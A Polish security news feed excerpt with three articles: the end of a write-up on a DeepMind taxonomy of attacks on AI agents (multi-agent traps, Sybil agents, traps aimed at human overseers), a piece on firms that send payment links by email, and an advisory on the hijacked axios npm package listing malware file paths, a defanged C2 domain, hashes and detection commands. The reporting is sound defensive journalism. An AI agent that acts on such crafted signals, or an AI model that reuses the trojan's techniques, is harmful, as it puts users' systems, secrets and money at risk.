<p>Do tej grupy zaliczono ataki, które są wycelowane nie w pojedyncze agenty ale w środowiska łączące wiele agentów. To bardzo ciekawe zagadnienie. Generalnie odnosi się do tego, że złe zachowanie pojedynczego agenta nie jest dużym problemem, ale jeśli wszystkie agenty powtarzają to zachowanie, to mamy duży problem. W tej grupie zagrożeń badacze wyróżnili m.in. <strong>Congestion Traps</strong> (pułapki przeciążeniowe). Wyobraźmy sobie, że nagle wszystkie nawigacje kierują pojazdy w okolicy na jedyną niezakorkowaną drogę. To mniej więcej ten problem. Zdaniem badaczy atakujący mogą to wykorzystać np. nadając specjalnie spreparowany komunikat wywołujący zsynchronizowaną wyprzedaż wśród agentów finansowych.</p>
<p>Inny typ takiej pułapki to <strong>Interdependence Cascades</strong> (kaskada współzależności). Działanie jednego agenta może zmienić środowisko, ale zmiana ta jest następnie postrzegana jako nowy sygnał przez inne agenty, których reakcje jeszcze bardziej modyfikują środowisko. Coś w rodzaju giełdowego zjawiska flash crash ale bez jawnej komunikacji między agentami (<strong>Tacit Collusion traps</strong>). Albo tzw. <strong>Sybil Attacks</strong>, czyli atak polegający na wprowadzeniu do systemu własnych agentów udających zaufane jednostki.</p>
<h3>Human-in-the-Loop Traps (pułapki na człowieka)</h3>
<p>Ostatnia grupa pułapek to ta, która jest wycelowana w ludzkiego nadzorcę systemów AI. Do takich ataków zaliczymy np. podawanie przez AI instrukcji postępowania (np. po ataku ransomware), które to instrukcje bardziej pomogą atakującemu niż ofiarom. Tu jednak badacze podkreślają, że literatury na ten temat jest mało, a zachowania ludzi są wysoce nieprzewidywalne. Zdecydowanie jest to obszar do dalszego badania.</p>
<h3>Mam swojego agenta AI &#8211; co robić, jak żyć?</h3>
<p>Dla zwykłego użytkownika AI powyższa klasyfikacja może być&#8230; ciekawym materiałem do przemyśleń. Dla specjalistów może to być punkt wyjścia do dyskusji o tworzeniu warstw w systemie bezpieczeństwa swoich agentów AI (aby nie dało się zmanipulować). Ten system powinien obejmować zabezpieczenia techniczne, i to różne, bo działające zarówno przy trenowaniu, jak i przy używaniu modeli (skanery treści, monitory wejścia itd.). </p>
<p>Z kolei dla właścicieli różnych zasobów, które agenty AI odwiedzają aby wykonać jakąś czynność (lub po prostu ukraść wiedzę) może to być poradnik, jak agentom zagrać na nosie&#8230; Pytanie jakie się nasuwa, to czy nie potrzebujemy już rozwiązań prawnych, np. w dziedzinie odpowiedzialności finansowej za skutki działania popsutego agenta? W pewnym sensie artykuł Google DeepMind stawia więcej pytań niż odpowiedzi, ale to właśnie dobrych pytań możemy teraz bardzo potrzebować&#8230;</p>
<p>PS. Potrzebujesz przeszkolić swoich (współ)pracowników z bezpiecznego i sensownego korzystania z narzędzi AI? Mamy dokładnie takie szkolenie! Napisz do nas na <a href="mailto:szkolenia.ai@niebezpiecznik.pl" target="_blank">szkolenia.ai@niebezpiecznik.pl</a> lub zadzwoń <strong>12-44-202-44</strong> aby otrzymać jego  agendę.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/ataki-na-agenty-ai-boty-ai-scrapery-ai/#comments" rel="replies" thr:count="16" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/ataki-na-agenty-ai-boty-ai-scrapery-ai/feed/atom/" rel="replies" thr:count="16" type="application/atom+xml"/>
			<thr:total>16</thr:total>
			</entry>
		<entry>
		<author>
			<name>Marcin Maj</name>
							<uri>https://niebezpiecznik.pl</uri>
						</author>

		<title type="html"><![CDATA[Duże firmy przyuczają ludzi do phishingu (po tym jak przed nim ostrzegały)]]></title>
		<link href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26831</id>
		<updated>2026-04-02T11:36:42Z</updated>
		<published>2026-04-02T11:36:42Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Luxmed"/><category scheme="https://niebezpiecznik.pl" term="PGNiG"/><category scheme="https://niebezpiecznik.pl" term="phishing"/><category scheme="https://niebezpiecznik.pl" term="socjotechnika"/><category scheme="https://niebezpiecznik.pl" term="Vectra"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Co łączy dostawcę gazu, firmę telekomunikacyjną i centrum medyczne? Takie firmy wysyłają do swoich klientów maile z linkami do płatności. Niestety nie służy budowaniu dobrych nawyków w przeciwdziałaniu phishingowi. Niewiele też wskazuje na to, aby to się miało zmienić. Problem linków w e-mailach To jest na swój sposób fascynujące. Firmy płacą za szkolenia z bezpieczeństwa. [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/"><![CDATA[<p>Co łączy dostawcę gazu, firmę telekomunikacyjną i centrum medyczne? Takie firmy wysyłają do swoich klientów maile z linkami do płatności. Niestety nie służy budowaniu dobrych nawyków w przeciwdziałaniu phishingowi. Niewiele też wskazuje na to, aby to się miało zmienić.<span id="more-26831"></span></p>
<h3>Problem linków w e-mailach</h3>
<p>To jest na swój sposób fascynujące. Firmy płacą za szkolenia z bezpieczeństwa. Banki prowadzą kampanie edukacyjne przeciwko phishingowi. Nawet państwo inwestuje w materiały edukacyjne, które mają wszystkich obywateli nauczyć jednego &#8212; <strong> nie wpisuj hasła w formularzu logowania, jeśli na stronę trafiłeś przez kliknięcie w link z e-maila.</strong>. Edukacja w tym zakresie jest prowadzona od wielu lat, bo to jedno z najstarszych i najczęstszych oszustw internetowych. A jednocześnie najbardziej skutecznych. </p>
<ul>
<li>Bo ludzie nie zawsze potrafią zorientować się, że e-mail nie pochodzi od tego, za kogo podaje się nadawca. </li>
<li>Bo ludzie nie potrafią też zauważyć literówki na pasku adresowym przeglądarki (lub w ogóle na niego nie patrzą) po kliknięciu w linka z e-maila.</li>
</ul>
<p>Wszystkim byłoby łatwiej, gdybyśmy materiałach edukacyjnych mogli napisać coś w stylu </p>
<blockquote><p>&#8220;żadna uczciwa firma nie będzie Cię zachęcać w e-mailu do logowania (lub płatności) przez kliknięcie w link&#8221;</p></blockquote>
<p>Dobre praktyki rynkowe są stosowane przez niektórych &#8212; zwróćcie uwagę jak w tym zakresie wygląda komunikacja od banków. W e-mailach jest najcześciej zwrot typu &#8220;zaloguj się na swoje konto, potem przejdź na zakładkę X aby aktywować Y&#8221;, <strong>ale bez linka</strong>. Klient przecież wie (powinien wiedzieć) jak się zalogować do usługi z której korzysta, a brak linka skłania go do samodzielnego wpisania adresu strony internetowej lub uruchomienia aplikacji. Tak, może ją wpisać z literówką. Tak, może ją wygooglać i trafić na lewą stronę. Ale te ryzyka nie prowadzą do tylu ofiar co phishing i można je szczelniej kontrolować, niż przyzwyczajenie klienta do &#8220;klikam w każdy link i wpisuję dane&#8221;.</p>
<p>Nie wiemy ile firm zachęca w swojej komunikacji do klikania w linki z e-maila prowadzące do logowania lub płatności, ale sami natknęliśmy się w ostatnim czasie na trzy przykłady.</p>
<div class="info">
Zagrożeń czyhających na internautów jest zdecydowanie więcej. O wszystkich opowiadamy w trakcie 3-godzinnego wykładu &#8220;<a href="https://niebezpiecznik.pl/wyklad" target="_blank">Jak nie dać się zhackować?</a>&#8220;. To nasz najlepszy wykład o cyberbezpieczeństwie dla każdego. Średnia ocena: 9,48/10. A oto terminy najbliższych wykładów: </p>
<ul>
		<!-- li><a href="https://nbzp.cz/jnsz-kra2510" target="_blank">KRAKOW <small>(weekend)</small> 4 października -- zapisz się tutaj!</a></li-->
<li><a href="https://nbzp.cz/jnsz-wro2606" target="_blank">WROCŁAW, 11 czerwca -- zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-kra2609" target="_blank">KRAKÓW, 24 września -- zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-poz2610" target="_blank">POZNAŃ, 8 października -- zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-lod2610" target="_blank">ŁÓDŹ, 22 października -- zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-gda2611" target="_blank">GDAŃSK, 19 listopada -- zapisz się tutaj!</a></li>
<li><a href="https://nbzp.cz/jnsz-waw2612" target="_blank">WARSZAWA, 3 grudnia -- zapisz się tutaj!</a></li>		
</ul>
<p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f449.png" alt="👉" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <a href="https://bilety.niebezpiecznik.pl/" target="_blank">Zobacz pełną agendę tego wykładu i reakcje uczestników poprzednich edycji</a>. </p>
<p>PS. Można (a nawet powinno się) na ten wykład wysłać lub przyjść z nietechnicznymi znajomymi!
</p></div>
<h3>Lux Med</h3>
<p>Przypadek numer 1: Grupa Lux Med. Osoby, które zarejestrowały się na wizytę lekarską w zakładzie tej firmy otrzymywały takiego oto maila z potwierdzeniem.</p>
<div id="attachment_26833" style="width: 596px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail.png"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-26833" class="size-large wp-image-26833" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-586x600.png" alt="" width="586" height="600" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-586x600.png 586w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail-244x250.png 244w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/luxmed-mail.png 719w" sizes="auto, (max-width: 586px) 100vw, 586px" /></a><p id="caption-attachment-26833" class="wp-caption-text">E-mail z Luxmed (wbrew pozorom nie scam)</p></div>
<p>Kliknięcie w link w e-mailu przekierowuje na stronę Luxmedu, która z kolei przekierowuje do bramki płatności PayU. Schemat wykorzystywany w wielu oszustwach internetowych &#8220;na dopłatę&#8221;.</p>
<p>Drugi przypadek: Vectra &#8211; dostawca internetu i innych usług telekomunikacyjnych. Klienci tej firmy po wystawieniu rachunku mogą otrzymać taki e-mail:</p>
<div id="attachment_26834" style="width: 572px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail.png"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-26834" class="size-large wp-image-26834" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail-562x600.png" alt="" width="562" height="600" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail-562x600.png 562w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail-234x250.png 234w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/vectra-mail.png 688w" sizes="auto, (max-width: 562px) 100vw, 562px" /></a><p id="caption-attachment-26834" class="wp-caption-text">Mail od Vectry</p></div>
<p>Link w mailu kieruje do eBok, a zaraz potem następuję przekierowanie do płatności. </p>
<p>Trzeci przypadek: PGNiG (Grupa Orlen). Ta firma w przeszłości <a href="https://pgnig.pl/aktualnosci/-/news-list/id/uwaga-na-falszywe-wiadomosci-email-podszywajace-sie-pod-pgnig-obrot-detaliczny-sp-z-o-o-/newsGroupId/10184">ostrzegała przed phishingiem</a>, ale jak widać poniżej, trochę &#8220;przyucza&#8221; do niego swoich klientów.</p>
<div id="attachment_26835" style="width: 539px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail.png"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-26835" class="size-large wp-image-26835" src="https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail-529x600.png" alt="" width="529" height="600" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail-529x600.png 529w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail-220x250.png 220w, https://niebezpiecznik.pl/wp-content/uploads/2026/01/pgnig-mail.png 549w" sizes="auto, (max-width: 529px) 100vw, 529px" /></a><p id="caption-attachment-26835" class="wp-caption-text">Mail od PGNIG</p></div>
<p>Link w mailu ma treść &#8220;Zapłać online&#8221; co sugeruje przejście od razu do płatności, jednak tu również klient najpierw przekierowany jest do eBOK, potem może przeklikać się do opcji płacenia. Dodajmy, że wyłudzenie dostępu do konta w takim eBOK też miałoby swoją wartość. Są tam dane o punktach poboru, poprzednich fakturach itd.</p>
<p>Wszystkie trzy podmioty odpytaliśmy o tę sprawę i zadaliśmy im kluczowe pytanie. Czy bylibyście Państwo skłonni zmienić te praktyki?</p>
<h3>Vectra: &#8220;Tak&#8230; ale&#8230; tego się nie da tak szybko zmienić&#8230;&#8221;</h3>
<p>Vectra po otrzymaniu pytań odpisała nam dwukrotnie. Najpierw zapewniono nas, że problem jest istotny i będzie analizowany. Potem dostaliśmy drugą, właściwą odpowiedź.</p>
<blockquote><p>Dzień dobry Panie Marcinie<br />
bezpieczeństwo cyfrowe naszych klientów jest dla nas niezwykle istotne i traktujemy je z najwyższą powagą. Spółka ustawicznie pracuje nad rozwijaniem różnorodnych, wielopłaszczyznowych elementów bezpieczeństwa, w tym dedykowanych dla Abonentów. Zgadzamy się, że należy podejmować wszelkie możliwe działania, by jak najskuteczniej eliminować zagrożenia, jakie niesie za sobą phishing, w szczególności ten w zakresie nieufania jakimkolwiek linkom zawartym w korespondencji. Jesteśmy świadomi zagrożeń i dlatego edukujemy stale w tych kwestiach zarówno naszych Klientów jak i pracowników oraz kontrahentów.<br />
Korespondencję masową, do której odniósł Pan swoje uwagi, charakteryzuje długi okres wdrażania nowych rozwiązań. Wynika to choćby z konieczności w tym zmiany dotychczasowych przyzwyczajeń w zakresie korzystania z wdrożonych udogodnień przez Abonentów i użytkowników, czy wyjaśniana przyczyn wprowadzanych zmian. Kluczowe w tym procesie jest także dostosowywanie się do percepcji i zgłaszanych potrzeb Klientów, które wynikają z ich różnego poziomu świadomości i umiejętności w korzystania z usług cyfrowych.<br />
<strong>W odniesieniu do podniesionej przez Pana kwestii eliminowania akcji odnośników, systematycznie ograniczamy ich liczbę i dążymy do pełnej ich eliminacji.</strong> Równolegle promujemy nasze systemy eBok, które stanowią bezpieczny i alternatywny, w tym zabezpieczony przez 2FA, kanał komunikacji, także dla korespondencji elektronicznej (e-mail).<br />
<strong>Podkreślamy, że nasze działania w obszarze zmian w komunikacji masowej muszą być wdrażane rozważnie i muszą adresować potrzeby naszych klientów.</strong> Nie możemy nikogo wykluczać z możliwości i korzyści, jakie dają usługi cyfrowe.<br />
Z pozdrowieniami<br />
Biuro prasowe Vectry</p></blockquote>
<p>Czyli &#8211; jak rozumiemy &#8211; niektórzy ludzie bez linka nie ogarną płatności i dlatego te linki są&#8230; systematycznie eliminowane. Bardzo cieszy nas fakt, że Vectra rozumie problem, ale jednocześnie mamy wrażenie, że nie w pełni.</p>
<h3>PGNIG: &#8220;To link do eBOK więc nie ma problemu!&#8221;</h3>
<p>PGNIG też nam odpowiedziało.</p>
<blockquote><p>Szanowny Panie Redaktorze,<br />
w PGNiG Obrót Detaliczny, Grupa ORLEN, dbamy o bezpieczeństwo klientów, w szczególności w obszarze usług cyfrowych. W ramach konsekwentnie realizowanej strategii chronimy dane oraz wspieramy klientów w bezpiecznym korzystaniu z oferowanych rozwiązań, m.in. poprzez informację i edukację (przykładem mogą być publikacje na naszej stronie internetowej: Ostrzeżenie przed fałszywymi mailami | PGNiG OD).<br />
<strong>Po Pana zgłoszeniu dokonaliśmy ponownej analizy naszej korespondencji z klientami. Wynika z niej, że w żadnym z szablonów wiadomości nie ma linków prowadzących do bezpośredniej płatności. Zamieszczone w nich odnośniki kierują do konkretnych procesów serwisu samoobsługowego eBOK i wymagają autoryzacji poprzez zalogowanie.</strong><br />
Mamy jednak świadomość, że dotychczasowy opis działania „zapłać on-line” mógł wprowadzać w błąd, sugerując niektórym użytkownikom, że link przekierowuje bezpośrednio do tzw. bramki płatniczej. W związku z tym dokonaliśmy korekty opisu na „zaloguj i zapłać”, wskazując jednoznacznie, że cały proces uzyskania wcześniejszego dostępu do systemu PGNiG Obrót Detaliczny.<br />
Serdecznie dziękujemy za Pana zgłoszenie, które przyczyniło się do zmiany, którą wdrożyliśmy.<br />
W razie pytań pozostaje do Pana dyspozycji.</p></blockquote>
<p>Zadaliśmy spółce dodatkowe pytania starając się delikatnie wyjaśnić, że zamieszczanie w mailu linka do jakiejkolwiek strony logowania nie jest najlepszym pomysłem. Do momentu pisania tego tekstu nie otrzymaliśmy żadnych dodatkowych odpowiedzi.</p>
<h3>Luxmed: Prowadzimy prace &#8220;na rzecz wprowadzenia bezpieczniejszych metod&#8221;</h3>
<p>W imieniu Luxmedu odpowiedział nam Łukasza Niewola, Dyrektor Departament Komunikacji Korporacyjnej i Zrównoważonego Rozwoju. Tu również odpowiedź jest w stylu &#8220;chcielibyśmy coś zmienić, ale jeszcze nie zmieniamy&#8221;.</p>
<blockquote><p>Grupa LUX MED stale udoskonala jakość usług, wprowadzając funkcjonalności dostosowane do potrzeb pacjentów, starając się zachować przy tym najwyższe standardy bezpieczeństwa. Linki do płatności w komunikacji e-mailowej są stosowane w ściśle określonych przypadkach. Przed wysłaniem e-maila z linkiem pacjent jest informowany, że go otrzyma i mam możliwość skorzystania z tej formy płatności. Jednocześnie podkreślamy, że w wiadomościach e-mail potwierdzających rezerwację wizyty, czy przypominających o wizycie nie wysyłamy linków do płatności.<br />
Obecnie trwają zaawansowane prace, które mają na celu wygasić tę formę płatności na rzecz wprowadzenia bezpieczniejszych metod. W najbliższym czasie nasi pacjenci będą mogli dokonać płatności przez Portal Pacjenta LUX MED lub stronę sklep.luxmed.pl.<br />
W zdecydowanej większości płatności za usługi dokonywane są przez naszych pacjentów w centrach medycznych przed wizytami.</p></blockquote>
<h3>Co robić? Jak żyć?</h3>
<p>Nigdy nie powinieneś płacić czy logować się po kliknięciu w link z e-maila. Najlepiej samodzielnie wejść na właściwy serwis internetowy nadawcy i poszukać akcji/opcji o której informuje Cię w e-mailu. Wtedy masz pewność, że klikasz po właściwym serwisie. Jeśli po kliknięciu w link widzisz formularz logowania lub płatności, to popatrz na adres URL. Zweryfikuj też szczegóły ewentualnej płatności (kwota, odbiorca), bo bramka płatności może być prawdziwa, ale pieniądze niekoniecznie powędrują tam gdzie myślisz lub w kwocie której się spodziewałeś.</p>
<p>A jeśli prowadzisz firmę i oferujesz jakąś usługę zwykłym konsumentom, nie proponuj im płatności e-mailem po kliknięciu w link. </p>
<p>Ryzyk czyhających na internautów jest więcej. Opowiadamy o nich w trakcie wykładu &#8220;<a href="https://niebezpiecznik.pl/wyklad" target="_blank">Jak nie dać się zhackować?</a>&#8220;, który już w kwietniu odbędzie się w <strong>Krakowie</strong> i <strong>Warszawie</strong>. <a href="https://bilety.niebezpiecznik.pl/" target="_blank">Zobacz pełną agendę tego wykładu i terminy</a>. PS. Można (a nawet powinno się) na ten wykład wysłać lub przyjść z nietechnicznymi znajomymi! </p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/#comments" rel="replies" thr:count="20" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/duze-firmy-przyuczaja-ludzi-do-phishingu-po-tym-jak-przed-nim-ostrzegaly/feed/atom/" rel="replies" thr:count="20" type="application/atom+xml"/>
			<thr:total>20</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Poważny atak programistów. Popularna biblioteka axios była zainfekowana.]]></title>
		<link href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26976</id>
		<updated>2026-03-31T08:36:24Z</updated>
		<published>2026-03-31T07:51:10Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="ataki"/><category scheme="https://niebezpiecznik.pl" term="axios"/><category scheme="https://niebezpiecznik.pl" term="programowanie"/><category scheme="https://niebezpiecznik.pl" term="supply-chain"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-150x150.jpg 150w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-252x250.jpg 252w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-600x594.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-768x761.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme.jpg 1234w" sizes="auto, (max-width: 100px) 100vw, 100px" /></a>Oprogramowanie na twoim komputerze korzysta z Node&#8217;a? I masz w paczkę axiosa jako zależność? Rzuć wszystko i sprawdź z jakiej wersji korzystasz. Ktoś wstrzyknął do tej biblioteki złośliwy kod. Jeśli ją pobrałeś, Twój sprzęt i klucze chmurowe są w rękach przestępców. Co się stało? Właśnie odkryto kolejny poważny atak na łańcuch dostaw. Tym razem oberwała popularna biblioteka [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/powazny-atak-programistow-popularna-biblioteka-axios-byla-zainfekowana/"><![CDATA[<p>Oprogramowanie na twoim komputerze korzysta z Node&#8217;a? I masz w paczkę <span class="code">axiosa</span> jako zależność? Rzuć wszystko i sprawdź z jakiej wersji korzystasz. Ktoś wstrzyknął do tej biblioteki złośliwy kod. Jeśli ją pobrałeś, Twój sprzęt i klucze chmurowe są w rękach przestępców. <span id="more-26976"></span></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-252x250.jpg" alt="" width="252" height="250" class="aligncenter size-medium wp-image-26977" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-252x250.jpg 252w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-600x594.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-150x150.jpg 150w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme-768x761.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-meme.jpg 1234w" sizes="auto, (max-width: 252px) 100vw, 252px" /></a></p>
<h3>Co się stało?</h3>
<p>Właśnie odkryto <a href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/" target="_blank">kolejny poważny atak na łańcuch dostaw</a>. Tym razem oberwała popularna biblioteka programistyczna <strong>axios</strong> powszechnie wykorzystywana do generowania żądań HTTP (pobierana ok. <strong>100 milionów razy tygodniowo</strong>!). Tuż po północy atakujący przejęli kontrolę nad kontem <strong>npm</strong> twórcy biblioteki axios i opublikowali dwie złośliwe wersje, omijając pipeline CI/CD oparty o GitHub Actions i OIDC (Trusted Publisher). Skorzystali po prostu z ręcznej publikacji z pomocą wykradzionego developerowi długoterminowego tokenu dostępu (kto wie, może ów developer, czyli <strong>jasonsaayman</strong> jest ofiarą <a href="https://niebezpiecznik.pl/post/litellm-pypi-python-hack/" target="_blank">ostatniego ataku na LiteLLM</a>?).</p>
<p>Oto zainfekowane paczki:<br />
<code>1.14.1 (31 marca o 00:21 UTC, tag latest)<br />
0.30.4 (31 marca 01:00 UTCtag legacy) </code></p>
<p>Zachowanie wstrzykniętego złośliwego kodu różni się między systemami:</p>
<ul>
<li><strong>Windows</strong>: Nadpisuje i chowa się pod fałszywym plikiem Windows Terminal (<span class="code">%PROGRAMDATA%\wt.exe</span>), po czym odpala złośliwego PowerShella. (np. <span class="code">%TEMP%\6202033.ps1</span>, <span class="code">%TEMP%\6202033.vbs</span>)</li>
<li><strong>macOS</strong>: Udaje demona systemowego, zrzucając plik do rzadko sprawdzanego katalogu <span class="code">/Library/Caches/com.apple.act.mond</span> (plus pliki pod <span class="code">$TMPDIR/6202033</span>).</li>
<li><strong>Linux</strong>: Instaluje pythonowego backdoora w <span class="code">/tmp/ld.py</span>.</li>
</ul>
<p>Malware łączy się z C2 pod adresem <span class="code">sfrclak[.]com:8000</span> i wysyła dane o Twoim środowisku, nasłuchuje poleceń oraz zaciera za sobą ślady usuwając pliki instalacyjne. Daje też atakującemu możliwość zdalnego wykonania kodu (RCE).</p>
<blockquote><p>IoC:<br />
IP Serwerów C2: 142.11.206[.]73<br />
Domena kampanii C2 i URL: http://sfrclak[.]com:8000/6202033 oraz sfrclak[.]com (do odrzucenia na poziomie /etc/hosts / iptables)<br />
Złośliwe emaile: ifstap@proton.me oraz nrwise@proton.me<br />
SHA-256 Sumy pakietów w przestrzeni npm:<br />
złośliwy axios w. 1.14.1 &#8211; 2553649f232204966871cea80a5d0d6adc700ca<br />
złośliwy axios w. 0.30.4 &#8211; d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71<br />
złośliwy pakiet plain-crypto-js w. 4.2.1 &#8211; 07d889e2dadce6f3910dcbc253317d28ca61c766<br />
Payload ld.py &#8211; fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf<br />
pierwszy dropper setup.js &#8211; e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09</p></blockquote>
<h3>Szczegóły techniczne ataku</h3>
<p>Atak był dość dyskretny, nie zmodyfikowano ani jednej linii kodu źródłowego axiosa (co mocno utrudniało wykrycie problemu m.in. z pomocą bazujących na kodzie skanerów typu diff). Jedynymi modyfikacjami w pliku <span class="code">package.json</span> było dodanie złośliwej zależności <span class="code">plain-crypto-js: &#8220;^4.2.1&#8221;</span> oraz usunięcie natywnego skryptu <span class="code">&#8220;prepare&#8221;: &#8220;husky&#8221;</span>. </p>
<p>Nowa zależność nigdy nie była importowana, jej celem było osadzenie instrukcji wywoływanej przy pobieraniu pakietu w tle: <span class="code">&#8220;postinstall&#8221;: &#8220;node setup.js&#8221;</span>. Nieźle to zaplanowano, bo pakiet <span class="code"><a href="https://socket.dev/npm/package/plain-crypto-js/files/4.2.1/setup.js" target="_blank">plain-crypto-js</a></span> udostępnił na nowym koncie na platformie ProtonMail inny osobnik, podpisujący się jako <strong>nrwise</strong> (nrwise@proton.me). Pierwsza wersja z pełnym fałszywym i nieaktywnym kodem (4.2.0) została umieszczona w serwisie <strong>30 marca o 05:57 UTC</strong>, a zainfekowana (4.2.1) o 23:59 UTC, czyli tuż przed wstrzyknięciem jej do złośliwego axiosa. Aby uśpić czujność ewentualnych badaczy, <strong>plain-crypto-js</strong> podszywał się pod inną, bezpieczną bibliotekę <span class="code">crypto-js</span> poprzez linkowanie opisu, aż po kopiowanie dziesiątek z oryginalnych plików (m.in. aes.js o rozmiarze 8649 bajtów, blowfish.js, md5.js, sha256.js, itp.). </p>
<p>Jedyne obce i groźne pliki we wstrzykniętym archiwum to zaledwie jedno-linijkowy <span class="code">setup.js</span> (wielkości 4209 bajtów) oraz czysty szablon konfiguracji <span class="code">package.md</span> o rozmiarze 725 bajtów. Tutaj <a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan" target="_blank">pełna analiza</a> wstrzykniętego trojana. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-600x224.jpg" alt="" width="600" height="224" class="aligncenter size-large wp-image-26978" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-600x224.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-350x131.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-768x287.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm-1536x574.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/03/axios-npm.jpg 1658w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>Mam Axiosa &#8212; co robić, jak żyć?</h3>
<p>Jeśli zainstalowałeś wersję 1.14.1 lub 0.30.4, musisz założyć najgorsze. Atakujący mogli mieć całkowity dostęp do Twojego systemu. Dlatego natychmiast:</p>
<ul>
<li>Sprawdź czy masz zainfekowane paczki. Stepsecurity sugeruje wykonanie tych poleceń:
<p><code>npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"<br />
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"<br />
ls node_modules/plain-crypto-js 2>/dev/null && echo "POTENTIALLY AFFECTED"<br />
# macOS<br />
ls -la /Library/Caches/com.apple.act.mond 2>/dev/null && echo "COMPROMISED"<br />
# Linux<br />
ls -la /tmp/ld.py 2>/dev/null && echo "COMPROMISED"<br />
# Windows (cmd.exe)<br />
dir "%PROGRAMDATA%\wt.exe" 2>nul && echo COMPROMISED</code></p>
<li>Odłącz maszynę od internetu, zbierz ślady pod forensic, a jeśli nie zamierzasz lub nie potrafisz go przeprowadzać, to odtwórz maszynę z czystego backupu lub przeinstaluj.
<li>Zrotuj klucze SSH, klucze API, tokeny NPM i inne sekrety. Nie zapomnij o plikach .env. Zmień hasła.
</ul>
